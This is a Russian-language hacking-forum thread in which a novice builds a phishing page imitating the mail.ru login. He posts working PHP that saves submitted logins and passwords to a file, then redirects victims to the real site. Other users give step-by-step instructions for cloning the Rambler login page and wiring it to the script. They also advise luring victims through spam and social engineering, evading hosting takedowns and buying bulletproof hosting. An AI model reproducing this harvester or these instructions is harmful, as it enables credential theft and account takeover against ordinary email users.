• XSS.stack #1 – первый литературный журнал от юзеров форума

Как впарить фейк жертве???

Статус
Закрыто для дальнейших ответов.
Отслеживать

lipchanin

HDD-drive
Пользователь
Регистрация
09.02.2009
Сообщения
26
Реакции
0
Собственно сделал следующее:
http://dinamit.easyforum.ru/viewtopic.php?id=3

Вопрос как сделать так, чтобы это заработало? Объясните пожалуйста. Как впарить фейк жертве??? Что для этого надо сделать, если можно, то приведите пример. Заранее благодарю.
 
Чтобы это заработало выгрузи на хост. Расставь права... Как впарить жертве? Это творческо-реторический вопрос... Если хочешь впарить сообществу - организуй спам-рассылку, с какой-нибудь убедительной информацией, чтобы их заинтриговало и они начали щёлкать по твоим ссылкам. Если атака на конкретную жертву - тут уместнее будет использовать СИ, втереться в доверие, привлечь внимание, и в ходе диалога подсунуть фейковую ссылку... Успех будет зависеть от твоей адекватности, лопоухости жертвы и "красоты" фейкового домена...
 
А дальше ищем актив хсс на маиле, рисуем ссылку и делаем рассылку =)
Саламандра тебе в соседней теме про гидру ответила...
 
salamandra
Сенкс, я сейчас СИ практикую на чате майл ру, методом секретных вопросов пароли вытягиваю

Добавлено в [time]1234352891[/time]
Ссылку на морду фейка

Это адрес чтоли
 
Ссылку на морду фейка

Это адрес чтоли
да, там где висит фейк

Сенкс, я сейчас СИ практикую на чате майл ру, методом секретных вопросов пароли вытягиваю
Ммм, просто теряешь время, ценность добытых мыл => 0
 
У меня висит на www.ho.ua - это бесплатный хостинг

Сервер: s1.ho.ua

Домен: www.komper2009.ho.ua

а на что ссылку давать на www.komper2009.ho.ua ???

даю туда ссылку выскакивает вот это



Почта Адреса Мой Мир Фото Видео Блоги Игры Знакомства 0% переплаты





Авторизация


Для входа в систему введите, пожалуйста, логин и пароль. Если у Вас еще нет логина, Вам необходимо зарегистрироваться.


Имя @mail.ru@inbox.ru@bk.ru@list.ru
Пароль Забыли пароль?

Чужой компьютер


бред какой то, наверняка я что то не так делаю, но я всё равно к цели приду с вашей помощью
 
Ну допустим послал я ссылку www.komper2009.ho.ua на почту 7rf@rambler.ru, человек щёлкнул по моей ссылке и что дальше, где пароль на его почту посмотреть? (кстати когда получатель переходит по ссылке у него выходит почта mail.ru и просит ввести логин ипароль)
И ещё объясните пожалуйста, я вот этот файл набил в блокноте и сохранил как mail.php? что я сделал не так?

Сам файл внутри выглядит вот так (что убрать, а что добавить? Где я ошибся?)

<?PHP
$Login = $_POST['Login'];//Логин от E-mail'a
$Domain = $_POST['Domain'];//Домен (mail, inbox, list, bk)
$Pass = $_POST['Password'];//Пароль от E-mail'a
$c = "$Login@$Domain:$Pass";
$fp = fopen("file","a+"); //открыть файл
fwrite($fp,"\n $c
\n");//записываем вс` данные
fclose($fp); //закрываем
header("Location: http://win.mail.ru/cgi-bin/login"); //куда перенавравиться пользователь после ввода данных
echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"
?>


Добавлено в [time]1234375359[/time]
файл index.php правильно собрал по инструкции (там конечно тяжело ошибиться)

Добавлено в [time]1234375411[/time]
E.N.G.Land
Лучше бы мучал фейк мэйлру агента...
а это как я с удовольствием займусь
 
Ну допустим послал я ссылку www.komper2009.ho.ua на почту 7rf@rambler.ru, человек щёлкнул по моей ссылке и что дальше, где пароль на его почту посмотреть? (кстати когда получатель переходит по ссылке у него выходит почта mail.ru и просит ввести логин ипароль)
И ещё объясните пожалуйста, я вот этот файл набил в блокноте и сохранил как mail.php? что я сделал не так?

Сам файл внутри выглядит вот так (что убрать, а что добавить? Где я ошибся?)

<?PHP
$Login = $_POST['Login'];//Логин от E-mail'a
$Domain = $_POST['Domain'];//Домен (mail, inbox, list, bk)
$Pass = $_POST['Password'];//Пароль от E-mail'a
$c = "$Login@$Domain:$Pass";
$fp = fopen("file","a+"); //открыть файл
fwrite($fp,"\n $c
\n");//записываем вс` данные
fclose($fp); //закрываем
header("Location: http://win.mail.ru/cgi-bin/login"); //куда перенавравиться пользователь после ввода данных
echo "<**** HTTP-EQUIV=\"*******\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"
?>
 
Ребят, вообщем я разобрался, всё получилось, пароли приносит мой фейк, теперь интересно как его настроить на почту rambler, yandex ит.д.
Может кто нибудь объяснить где и что надо переписать?
 
Ребят, вообщем я разобрался, всё получилось, пароли приносит мой фейк, теперь интересно как его настроить на почту rambler, yandex ит.д.
Может кто нибудь объяснить где и что надо переписать?
Заходи на страницу авторизации которую хочешь подделать. ( http://id.rambler.ru/ )
Сохраняй эту страницу в формате html. Ну или дерни исходный код страницы, а потом переменуй в php (Вариант с html имхо лучше).
Запихнув сохраненную страницу в блокнот, замени следующие вещи:
Код: 
<form method="post" action="auth" onSubmit="return CheckForm(this);">
на
Код: 
<form method="post" action="mail.php (ну или твой вариант названия скрипта отвечающего за запись переменных)" onSubmit="return CheckForm(this);">
Проследи чтобы nаme в коде поделываемой страницы совпадал с названиями в файле mail.php .
Пример..
//Логин в коде страницы:
name="login" value="" type="text" size="20

//имя логина в mail.php:
$Login = $_POST['login']; // Логин
$Pass = $_POST['passwd']; // Пароль

//Пароль в коде страницы:
type="password" size="20" name="passwd"

//имя пароля в mail.php следовательно должно быть:
$Login = $_POST['login']; // Логин
$Pass = $_POST['passwd']; // Пароль

С именем домена также.

Ну и все собственно, льем файлы (3 файла + папка с картинками) на хостинг..
ставим права..
гребем пассы.

П.с. Так как объяснял не разжеванно, замечу, что все миллион раз описывалось в статьях по созданию фейков.. чтото не понятно, юзаем гугл.
 
Понимаю конечно, что большая часть вопросов в этом топике так скажем 'сурова'
Ну я думаю ничего страшного, все когда-то учились. Все что-то спрашивали.
У меня вопрос созрел, читал где-то в хакере, про подмену URL адреса, на нужный нам.
Ну сами понимаете чтобы фейк прошибал серьезных людей без этого никак.
Там реализация была на js, никто не подкинет код? Пару дней уже гуглил на эту тему.

Если у кого скрипт остался подкиньте, и конечно интересно как он работает в новых браузерах?
 
Ваш сайт подозревается в мошенничестве - попытке ввести в
заблуждение посетителей сайта http://mail.ru.
Размещение таких сайтов является нарушением Правил нашего хостинга.
С владельцами таких сайтов мы не ведём переговоры об открытии,
все данные передаём соответствующим службам по первому же запросу.

Вот такая вот шняга пришла на почту сегодня, как не допустить такого больше, чтоб не спалили

Добавлено в [time]1234431509[/time]
П.с. Так как объяснял не разжеванно, замечу, что все миллион раз описывалось в статьях по созданию фейков.. чтото не понятно, юзаем гугл.

А может разжуёшь? :help: , а ясравню с моим фейком на mail.ru и сделаю выводы для себя где и что менять
 
Может быть кто нибудь посоветует получше бесплатный хостинг с поддержкой php., только чтоб там мне доступ не закрыли
 
lipchanin, друг, даже на легальном ПЛАТНОМ хостинге тебя если найдут - вставят пистонов... Админы там не дураки, они ни за какие условия не будут размещать нелегальный стафф на своих серверах. Хочешь чтобы тебя никто не дёргал? Покупай безабузный хостинг, там тебе никто и слова не скажет, только плати бабки. Но я думаю, ты сейчас платить не готов...
 
Но я думаю, ты сейчас платить не готов...
это точно, уровень мастерства не тот как хотелось бы
друг, даже на легальном ПЛАТНОМ хостинге тебя если найдут - вставят пистонов...
а как же тогда быть? Учиться то хочется, практиковаться на чём?
 
Статус
Закрыто для дальнейших ответов.
Верх